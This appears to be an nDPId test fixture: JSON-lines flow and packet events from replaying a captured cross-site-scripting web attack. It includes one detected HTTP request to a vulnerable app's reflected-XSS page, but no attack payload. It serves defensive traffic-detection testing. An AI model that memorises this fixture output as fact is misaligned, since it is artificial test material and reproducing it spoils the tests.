-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1066,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1499347092375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347092375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0RpaHI+7aTfNDqAScSDUZwAAAgQFtAQCCAoD4zMnATlhsAEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1067,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1499347092375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347092375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rL5AAD4GGRqsEAABwKgKMtEaAFBpN80OWhyPvIAQAOVzbwAAAQEICgE5YbAD4zMn"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347093662,"flow_last_seen":1499347093662,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347093662,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53544,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1499347093662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Ku9AAD4GmuGsEAABwKgKMtEoAFAtsEgdAAAAAKACchCzkgAAAgQFtAQCCAoBOWLyAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1499347093662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347093662,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Shd8PQZLbBIHqAScSAqGwAAAgQFtAQCCAoD4zRpATli8gEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1082,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1499347093663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347093663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KvBAAD4GmuisEAABwKgKMtEoAFAtsEgeXfD0GoAQAOXJIgAAAQEICgE5YvID4zRp"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347096201,"flow_last_seen":1499347096201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347096201,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1499347096201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096201,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZsxAAD4GXwSsEAABwKgKMtFCAFCngwOhAAAAAKACchB7pgAAAgQFtAQCCAoBOWVtAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1499347096202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347096202,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0UJnxk6+p4MDoqAScSCLOQAAAgQFtAQCCAoD4zbkATllbQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1499347096202,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347096202,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Zs1AAD4GXwusEAABwKgKMtFCAFCngwOiZ8ZOv4AQAOUqQQAAAQEICgE5ZW0D4zbk"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347097460,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347097460,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1107,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83YdAAD4G6EisEAABwKgKMtFQAFAbC7sgAAAAAKACchBPVwAAAgQFtAQCCAoBOWanAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347097460,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0VBz69jzGwu7IaAScSDHVQAAAgQFtAQCCAoD4zgeATlmpwEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1109,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1499347097460,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347097460,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03YhAAD4G6E+sEAABwKgKMtFQAFAbC7shc+vY9IAQAOVmXAAAAQEICgE5ZqgD4zge"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347098746,"flow_last_seen":1499347098746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347098746,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1499347098746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gixAAD4GQ6SsEAABwKgKMtFeAFA\/7+XFAAAAAKACchD+fQAAAgQFtAQCCAoBOWfpAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1499347098746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347098746,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0V6c5l18P+\/lxqAScSDHtgAAAgQFtAQCCAoD4zlgATln6QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1121,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1499347098747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347098747,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gi1AAD4GQ6usEAABwKgKMtFeAFA\/7+XGnOZdfYAQAOVmvgAAAQEICgE5Z+kD4zlg"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347101314,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347101314,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53624,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8HlBAAD4Gp4CsEAABwKgKMtF4AFDPTHQ7AAAAAKACchDeDgAAAgQFtAQCCAoBOWprAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1499347101314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347101314,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0XjCGItuz0x0PKAScSBRoQAAAgQFtAQCCAoD4zviATlqawEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1499347101315,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347101315,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HlFAAD4Gp4esEAABwKgKMtF4AFDPTHQ8whiLb4AQAOXwqAAAAQEICgE5amsD4zvi"} 
-00972{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347097460,"flow_last_seen":1499347102358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347102358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347102609,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347102609,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53638,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ux5AAD4GCrKsEAABwKgKMtGGAFBKzdCxAAAAAKACchAExgAAAgQFtAQCCAoBOWuvAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1499347102609,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347102609,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0YYGn50FSs3QsqAScSAg+AAAAgQFtAQCCAoD4z0lATlrrwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1155,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1499347102610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347102610,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ux9AAD4GCrmsEAABwKgKMtGGAFBKzdCyBp+dBoAQAOW\/\/wAAAQEICgE5a68D4z0l"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347105154,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347105154,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eX9AAD4GTFGsEAABwKgKMtGgAFC6fhdUAAAAAKACchBL3AAAAgQFtAQCCAoBOW4rAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347105154,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0aA4hAGdun4XVaAScSDPFAAAAgQFtAQCCAoD4z+iATluKwEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1499347105154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347105154,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eYBAAD4GTFisEAABwKgKMtGgAFC6fhdVOIQBnoAQAOVuHAAAAQEICgE5bisD4z+i"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347106438,"flow_last_seen":1499347106438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347106438,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53678,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1499347106438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8kWRAAD4GNGysEAABwKgKMtGuAFDha\/4IAAAAAKACchA86wAAAgQFtAQCCAoBOW9sAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1181,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1499347106438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347106438,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0a4RPd924Wv+CaAScSAIUAAAAgQFtAQCCAoD40DjATlvbAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1182,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1499347106439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347106439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0kWVAAD4GNHOsEAABwKgKMtGuAFDha\/4JET3fd4AQAOWnVwAAAQEICgE5b2wD40Dj"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347107719,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347107719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GMdAAD4GrQmsEAABwKgKMtG8AFANSWhrAAAAAKACchClXQAAAgQFtAQCCAoBOXCsAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1499347107719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347107719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0byrN2AMDUlobKAScSBU8gAAAgQFtAQCCAoD40IjATlwrAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1499347107720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347107720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GMhAAD4GrRCsEAABwKgKMtG8AFANSWhsqzdgDYAQAOXz+AAAAQEICgE5cK0D40Ij"} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1499346976677,"flow_last_seen":1499346982914,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5330,"flow_tot_l4_payload_len":6852,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499346976999,"flow_last_seen":1499346982906,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1707,"flow_tot_l4_payload_len":2065,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346976999,"flow_last_seen":1499346982607,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346983175,"flow_last_seen":1499346988608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1207,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346984469,"flow_last_seen":1499346989608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347109003,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52400,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 